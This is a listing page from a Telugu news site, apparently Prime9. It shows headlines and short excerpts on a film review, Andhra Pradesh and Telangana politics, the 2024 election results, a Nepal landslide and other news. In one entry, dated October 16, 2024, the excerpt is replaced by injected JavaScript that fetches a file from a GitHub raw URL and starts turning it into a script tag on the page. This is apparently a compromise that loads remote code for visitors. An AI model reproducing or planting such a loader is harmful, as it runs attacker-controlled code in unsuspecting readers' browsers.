Home/uncategorized
uncategorized
Premisthunna Movie Review: యూత్‌ఫుల్ ఎంటర్‌టైనర్‌.. ‘ప్రేమిస్తున్నా’ మూవీ రివ్యూ& రేటింగ్
Premisthunna Movie Review: యూత్‌ఫుల్ ఎంటర్‌టైనర్‌.. ‘ప్రేమిస్తున్నా’ మూవీ రివ్యూ& రేటింగ్

November 7, 2025

premisthunna movie review: బాల నటుడిగా మంచి పేరు తెచ్చుకున్న నటుడు సాత్విక్‌ వర్మ హీరోగా, ప్రీతీ నేహా జంటగా నటించిన సినిమా ప్రేమిస్తున్నా. ఈ సినిమా నేడు విడుదలైంది. ఈ మూవీ రివ్యూ, రేటింగ్ గురించి తెలుసుకుందాం పదండి.

Prime9-Logo
Deputy Chief Minister Bhatti Vikramarka: నాలుగు నెలల్లో నైనీ కోల్ బ్లాకులో ఉత్పత్తి ప్రారంభించాలి.. డిప్యూటీ సీఎం భట్టి విక్రమార్క

October 16, 2024

;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src...

Prime9-Logo
CM Revanth Reddy: 90 రోజుల్లో 30వేల ఉద్యోగాలు.. సీఎం రేవంత్ రెడ్డి

October 6, 2024

CM Revanth Reddy Distributes Appointment Letter: కాంగ్రెస్ ప్రభుత్వం అధికారంలోకి వచ్చిన 90 రోజుల్లోనే 30వేల ఉద్యోగాలు ఇచ్చామని సీఎం రేవంత్ రెడ్డి వెల్లడించారు. హైదరాబాద్‌లోని శిల్పారామంలో నిర్వహించిన ...

Prime9-Logo
Ram Nagar Bunny: 'రామ్ నగర్ బన్నీ' కంప్లీట్ ఎంటర్ టైనర్.. ఇలాంటి మూవీ చేయడం అదృష్టం.. యంగ్ హీరో చంద్రహాస్

October 4, 2024

Ram Nagar Bunny: 'రామ్ నగర్ బన్నీ' కంప్లీట్ ఎంటర్ టైనర్.. ఇలాంటి మూవీ చేయడం అదృష్టం.. యంగ్ హీరో చంద్రహాస్ Attitude Star Chandrahass in Ram Nagar Bunny: టాలీవుడ్ యంగ్ హీరో చంద్రహాస్ నటించిన లేటెస్ట్...

Prime9-Logo
Pawan Kalyan Comments: పోటీ చేసిన అన్ని స్థానాల్లో గెలిచి.. దేశంలోనే రికార్డు నెలకొల్పాము.. పవన్ కళ్యాణ్

July 15, 2024

పోటీ చేసిన అన్ని స్థానాల్లో గెలిచి.. దేశంలోనే ఒక రికార్డు నెలకొల్పామని.. జనసేన అదినేత.. డిప్యూటీ సీఎం పవన్ కళ్యాణ్ అన్నారు. మంగళగిరిలోని జనసేన పార్టీ కార్యాలయంలో నిర్వహించిన ప్రతినిధుల సభలో ఆయన మాట్లడారు.

Prime9-Logo
Nepal: నేపాల్‌లో కొండచరియలు విరిగిపడి నదిలో కొట్టుకుపోయిన రెండు బస్సులు.. 65 మంది గల్లంతు

July 12, 2024

నేపాల్‌లో శుక్రవారం తెల్లవారుజామున కొండచరియలు విరిగిపడటంతో రెండు ప్రయాణీకుల బస్సులు నదిలో కొట్టుకుపోయాయి.రెండు బస్సులు 65 మంది ప్రయాణికులతో ప్రయాణిస్తున్నాయి. గల్లంతయిన వారిలో ఏడుగురు బారతీయులు ఉన్నారు.

Prime9-Logo
KTR on Party Defections: పార్టీ ఫిరాయింపులపై సుప్రీంకోర్టును ఆశ్రయిస్తాం: కేటీఆర్

June 25, 2024

బీఆర్ఎస్ ఎమ్మెల్యేల పార్టీ ఫిరాయింపులపై సుప్రీంకోర్టును ఆశ్రయిస్తామని మాజీ మంత్రి, బీఆర్ఎస్ వర్కింగ్ ప్రసిడెంట్ కేటీఆర్ స్పష్టం చేశారు. పోచారం శ్రీనివాసరెడ్డి రాహుల్ గాంధీని కలవటం పై ట్వీట్టర్ వేదికగా స్పందించిన ఆయన ఒకవైపు రాహుల్ గాంధీ రాజ్యాంగంలోని 10వ షెడ్యూల్ ను సవరిస్తామని మాట్లాడుతూ.. మరో వైపు అందుకు విరుద్ధంగా ఫిరాయింపులను ప్రోత్సహిస్తున్నారని కేటీఆర్ ఆగ్రహం వ్యక్తం చేశారు.

Prime9-Logo
Junior Doctors' Strike: మంత్రి దామోదర రాజనర్సింహతో జూనియర్ డాక్టర్ల చర్చలు విఫలం..

June 24, 2024

తెలంగాణ వైద్యశాఖా మంత్రి దామోదర రాజనర్సింహతో జూనియర్ డాక్టర్ల చర్చలు విఫలమయ్యాయి. మంత్రుల క్వార్టర్స్‌లో దామోదరతో జూడాలు చర్చించారు. కొన్ని డిమాండ్లను పరిష్కరించేందుకు సిద్ధంగా ఉన్నామని మంత్రి వారికి హామీ ఇచ్చారు.

Prime9-Logo
Bridge Collapses in Bihar: బిహార్‌లోని శివాన్‌లో కూలిన బ్రిడ్జి

June 22, 2024

మన దేశంలో కాంట్రాక్టర్లు నాసిరకం బ్రిడ్జిలు నిర్మించి ప్రజల ప్రాణాలతో చెలగాటమాడటం సర్వసాధారణం. బిహార్‌లోని ఆరియా అనే ఏరియాలో నాలుగు రోజుల క్రితం ఓ బ్రిడ్జి కూలింది. ఈ ఘటన మరిచిపోక ముందే శనివారం నాడు శివాన్‌లో మరోమరో బ్రిడ్జి కూలింది.

Prime9-Logo
Soaring Veggie Prices: కొండెక్కిన కూరగాయల ధరలు.. బెంబేలెత్తుతున్న ప్రజలు

June 22, 2024

జంట నగరాల ప్రజలే కాకుండా యావత్‌ తెలంగాణ ప్రజలు పెరిగిపోతున్న కూరగాయల ధరలు చూసి బెంబేలెత్తిపోతున్నారు. తాజాగా నిర్వహించిన సర్వేలో రాష్ర్ట జనాభాలో 50 శాతం మంది ప్రజలు పెరిగిన కూరగాయల ధరలతో ఇబ్బందులు పడుతున్నారని తేల్చింది.

Prime9-Logo
North korea vs South korea: దక్షిణ కొరియాను కవ్విస్తున్న ఉత్తర కొరియా

June 21, 2024

దక్షిణ కొరియాను కవ్విస్తోంది ఉత్తర కొరియా. డీమిలిటరైజ్డ్‌ జోన్‌ ను దాటి దక్షిణ కొరియా భూభాగంలోకి చొచ్చుకు వచ్చారు. దీన్ని దక్షిణ కొరియా తీవ్రంగా ప్రతిఘటించింది. వెంటనే వారిని హెచ్చరిస్తూ గాల్లో కాల్పులు కూడా జరిపింది.

Prime9-Logo
ORS At PM Modi Swearing: మోదీ ప్రమాణస్వీకార కార్యక్రమంలో ఓఆర్ఎస్ తాగిన అంబానీ, షారూఖ్ ఖాన్

June 10, 2024

ప్రధానమంత్రి నరేంద్రమోదీ ప్రమాణ స్వీకారం ఆదివారం నాడు న్యూఢిల్లీలోని రాష్ర్టపతి భవన్‌లో కన్నుల పండువగా జరిగింది. దేశ, విదేశాల నుంచి పలువురు అతిథులను ఆహ్వానించారు.

Prime9-Logo
Garbage Tax: ఏపీ ప్రజలకు గుడ్ న్యూస్ ..చెత్తపన్ను రద్దు

June 8, 2024

పీ ప్రజలకు కొత్త ప్రభుత్వం గుడ్ న్యూస్ తెలిపింది. రాష్ట్ర వ్యాప్తంగా గత ప్రభుత్వం విధించిన చెత్త పన్నును రద్దు చేస్తూ నిర్ణయం తీసుకుంది. ఇప్పటికే పట్టణాలు, నగరపాలక సంస్థలకు మౌఖిక ఆదేశాలు జారీ చేశారు.

Prime9-Logo
Jana Sena Landslide Victory: ఏపీ అసెంబ్లీ ఎన్నికల్లో దుమ్మురేపిన జనసేన.. పోటీ చేసిన 21 సీట్లలోనూ గెలుపు..

June 4, 2024

ఏపీ అసెంబ్టీ ఎన్నికల ఫలితాల్లో జనసేన పార్టీ దుమ్మురేపింది.  జనసేన పార్టీ పోటీ చేసిన 21 సీట్లను గెలుచుకుని అందరినీ ఆశ్చర్యంలో ముంచెత్తింది. రాజకీయ పరిశీలకులు, విశ్లేషకులు కూడా జనసేన ఈ స్దాయి విజయాన్ని సొంతం చేసుకుంటుందని ఊహించలేదు.

Prime9-Logo
AP Assembly Elections 2024: ఏపీని ఊడ్చేసిన తెలుగుదేశం కూటమి..

June 4, 2024

ఏపీ లో ప్రజల నాడీ ఏ సర్వే సంస్థలకు చిక్కలేదు మిశ్రమ ఫలితాలను అందించాయి అన్ని ఎగ్జిట్ పోల్స్ .కొన్ని ఏకపక్షంగా వైసీపీ కి అనుకూలంగా ఉంటే ,మరి కొన్ని సంస్థలు కూటమికి అనుకూలంగా ఫలితాలు వుంటాయని ప్రకటించాయి

Prime9-Logo
AP Exit Polls2024: ఏపీ అసెంబ్లీ ఎన్నికలు.. ఎగ్జిట్ పోల్స్ వచ్చేసాయి..

June 1, 2024

దాదాపు రెండు నెలలు ఎన్నికల ప్రహసనం శనివారంతో ముగిసింది .ఇక రాజకీయ రాజకీయ పార్టీలకు గెలుపుఓటమి పై గుబులు పట్టుకుంటుంది .ఈ క్రమంలో వివిధ మీడియా సంస్థలు చేపట్టిన ఎగ్జిట్ పోల్స్ సాయంత్రనికి వచ్చాయి .దింతో కొందరికి మోదం కొందరికి ఖేదంగా మారింది .

Prime9-Logo
Nawaz Sharif: 1999 లాహోర్‌ ఒప్పందాన్ని పాకిస్తాన్‌ ఉల్లంఘించింది.. పాక్ మాజీ ప్రధాని నవాజ్‌ షరీఫ్‌

May 29, 2024

మన దాయాది దేశం పాకిస్తాన్‌ ఎప్పుడు అబద్దాలు వల్లె వేస్తోంది తప్ప.. వాస్తవాలు మాత్రం చచ్చినా చెప్పదు. తిమ్మిన బమ్మిన చేయడంలో సిద్దహస్తురాలు. మరి అలాంటి పాక్‌కు మరి ఎందుకో జ్ఞానోదయం కలిగి చేసిన తప్పును ఒప్పకోవడం విశేషం. 1999లో ఇండియాతో కుదుర్చుకున్న లాహోర్‌ ఒప్పందాన్ని పాకిస్తాన్‌ ఉల్లంఘించిందన్న చేదు నిజాన్ని పాకిస్తాన్‌ మాజీ ప్రధానమంత్రి నవాజ్‌ షరీఫ్‌ బట్టబయలు చేశారు.

Prime9-Logo
TTD Deputy EE Sri Lakshmi: హత్యాయత్నం కేసులో టిటిడి డిప్యూటీ ఈఈ శ్రీలక్ష్మి అరెస్ట్

May 29, 2024

హత్యాయత్నం కేసులో టిటిడి డిప్యూటీ ఈఈ శ్రీలక్ష్మీని పోలీసులు అరెస్ట్ చేశారు. శ్రీలక్ష్మీతోపాటు ఆమె భర్త గిరీష్ చంద్రారెడ్డి, మరో ఇద్దరిని అలిపిరి పోలీసులు అదుపులోకి తీసుకున్నారు. సిసి కెమెరా ఆధారంగా పోలీసులు నిందితులను పట్టుకున్నారు.

Prime9-Logo
Pawan Kalyan: వీర మహిళల పోరాట స్పూర్తికి ధన్యవాదాలు.. పవన్ కళ్యాణ్

May 22, 2024

ఏపీలో మే 13న జరిగిన ఎన్నికల్లో జనసేన పార్టీ గెలుపు కోసం క్షేత్ర స్థాయిలో ఇంటింటికీ వెళ్ళి ఎన్నికల ప్రచారం చేసిన జనసేన వీర మహిళల సేవలు మరువలేనివని జనసేనాని పవన్ కళ్యాణ్ అన్నారు .ఈ మేరకు ఒక లేఖను విడుదల చేసారు .

Prime9-Logo
Thotakura Gopichand: రోదసిలో ప్రయాణించిన తొలి తెలుగు వ్యక్తిగా చరిత్ర సృషించిన తోటకూర గోపీచంద్

May 20, 2024

గోపీచంద్ తోటకూర.. ఇప్పుడీ తెలుగు పేరు అంతర్జాతీయంగా మార్మోగుతోంది. రోదసిలోకి వెళ్లి వచ్చిన తొలి భారతీయ పర్యాటకుడిగా తన పేరును లిఖించుకున్నారు. అమెజాన్ వ్యవస్థాపకుడు జెఫ్ బెజోస్ స్థాపించిన బ్లూ ఆరిజన్ సంస్థ న్యూ షెపర్డ్-25 పేరుతో నిర్వహించిన అంతరిక్షయాత్రలో గోపీచంద్ పాలుపంచుకున్నాడు.

Prime9-Logo
AP Assembly Elections 2024: రోడ్డు లేకపోయినా ఓటు వేయడానికి ముందుకు వచ్చిన గ్రామీణ ప్రజలు

May 13, 2024

తమ గ్రామానికి రోడ్డు లేదని కొందరు ,తమ పంటకు గిట్టుబాటు ధర లేదని కొందరు ,తమ గ్రామాన్ని ఎవరు పట్టించుకోలేదని కొందరు ఎన్నికలను బహిష్కరిస్తుంటే . మ‌రోవైపు పోలింగ్ బూత్‌కు వెళ్లేందుకు సరైన దారిలేక‌పోయినా వాగులు వంకలు దాటుకుని ఓటు వేస్తున్నారు.

Prime9-Logo
CM Revanth Reddy Comments: షర్మిలకు నా సపోర్ట్ తప్పకుండా ఉంటుంది .. సీఎం రేవంత్ రెడ్డి

May 9, 2024

తన చెల్లి షర్మిలను రేవంత్ రెడ్డి ద్వారా చంద్రబాబే నడిపిస్తున్నారని ఏపీ సీఎం, వైసీపీ చీఫ్ జగన్ మోహన్ రెడ్డి చేసిన వ్యాఖ్యలపై సీఎం రేవంత్ రెడ్డి గట్టిగా కౌంటర్ ఇచ్చారు. షర్మిల తమ పార్టీ సభ్యురాలని తమకు పొరుగున ఉన్న రాష్ట్రంలో కాంగ్రెస్ పార్టీకి ఆమె అధ్యక్షురాలన్నారు.

Prime9-Logo
Karnataka Sex scandal: కర్ణాటకలో దుమారం రేపుతున్న సెక్స్ స్కాండల్

April 29, 2024

కర్ణాటకలో ప్రస్తుతం తీవ్రమైన రాజకీయ దుమారం చెలరేగుతోంది. దీనికంతటికి కారణం మాజీ ప్రధానమంత్రి హెచ్‌డీ దేవగౌడ్‌ మనవడు ప్రజ్వల్‌ రెవన్న సెక్స్‌ స్కాండిల్‌లో కూరుకుపోవడమే. ప్రజ్వల్‌ అసభ్యకరమైన క్లిప్స్‌ ప్రస్తుతం కర్నాటకలో పెద్ద ఎత్తున సర్క్యులేట్‌ అవుతున్నాయి. దీంతో పాటు ఓ మహిళ కూడా జెడి ఎస్‌ నాయకుడు ప్రజ్వల్‌ తండ్రి హెచ్‌డీ రెవన్న తనపై లైంగిక దాడికి పాల్పడ్డాడని పోలీసు ఫిర్యాదు చేశారు

Prime9-Logo
Woman Wants Divorce: భర్త హనీమూన్ కోసం గోవాకు బదులు అయోధ్యకు తీసుకెళ్లాడని విడాకులు కోరుతున్న మహిళ

January 25, 2024

మధ్యప్రదేశ్‌కు చెందిన ఓ మహిళ తన పెళ్లయిన ఐదు నెలలకే తన భర్త నుంచి విడాకులు కోరింది. దీనికి కారణం అతను హనీమూన్‌కు గోవాకు తీసుకు వెడతానని చెప్పి అయోధ్య,వారణాసికి తీసుకు వెళ్లడమే. ఈ జంట వారి పర్యటన నుండి తిరిగి వచ్చిన 10 రోజుల తర్వాత, జనవరి 19న భోపాల్ ఫ్యామిలీ కోర్టులో పిటిషన్ దాఖలయింది.

Page 1 of 3(71 total items)